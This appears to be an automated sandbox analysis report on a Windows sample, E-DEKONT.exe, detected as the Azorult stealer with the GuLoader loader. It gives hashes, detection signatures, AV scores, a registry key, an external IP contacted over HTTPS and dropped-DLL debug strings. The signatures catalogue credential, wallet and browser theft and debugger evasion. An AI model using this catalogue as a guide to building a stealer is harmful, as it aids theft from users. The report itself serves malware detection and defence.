Windows Analysis Report
E-DEKONT.exe

Overview

General Information

Sample Name: E-DEKONT.exe
Analysis ID: 755881
MD5: 0aa36eb080cf7171cec271b2cd4d2108
SHA1: eb7f3bf8e15ae16e765e480510d2260a9e9facb8
SHA256: 6ca208edbc718f737f74ee0a631ed22cd2bf67a0db679d9d1702575c087550cc
Infos:

Detection

Azorult, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Self deletion via cmd or bat file
Tries to harvest and steal ftp login credentials
Tries to harvest and steal Bitcoin Wallet information
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Queries information about the installed CPU (vendor, model number etc)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Contains functionality to enumerate device drivers
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection

barindex
Source: E-DEKONT.exe Virustotal: Detection: 26% Perma Link
Source: E-DEKONT.exe ReversingLabs: Detection: 20%
Source: E-DEKONT.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\E-DEKONT.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fivefoldness\Endosseringerne\Fouragen Jump to behavior
Source: unknown HTTPS traffic detected: 103.14.99.114:443 -> 192.168.11.20:49851 version: TLS 1.2
Source: E-DEKONT.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944571274.000000001E798000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108907116476.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108911584847.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945279969.000000001E7C0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945375034.000000001E7C4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108911467372.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917692756.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr
Source: Binary string: mshtml.pdb source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmp
Source: Binary string: ucrtbase.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934547678.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108931941329.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108885630583.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939584393.000000001E710000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108890563485.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940725893.000000001E730000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940858034.000000001E734000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108898625241.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108899797081.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944393476.000000001E788000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108905955571.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108911584847.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108912726161.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.4.dr
Source: Binary string: mshtml.pdbUGP source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108889185436.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108901775165.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943865478.000000001E770000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108897608996.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108896445391.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963064431.000000001DDA8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938291383.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917692756.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108884832188.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108893462615.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109036371448.000000001E380000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108884832188.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108885416848.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108885630583.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108910182410.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108910928044.000000001DDD4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108903955995.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108902878047.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108904933284.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108904797866.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
Source: Binary string: msvcp140.i386.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108954916729.000000001DAB8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919075540.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919898776.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source: Binary string: ucrtbase.pdbUGP source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934547678.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108931941329.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108895399238.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108897608996.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108898625241.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.4.dr
